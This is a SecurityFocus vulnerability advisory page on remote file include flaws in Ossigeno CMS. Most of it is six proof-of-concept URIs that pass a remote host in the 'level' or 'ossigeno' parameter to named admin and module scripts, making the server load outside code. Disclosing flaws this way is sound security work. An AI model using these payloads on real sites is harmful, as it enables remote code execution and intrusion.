Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Ossigeno CMS Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/upload/xax/admin/modules/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/modules/uninstall_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/patch/index.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.example2.com
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com







 

Privacy Statement
Copyright 2009, SecurityFocus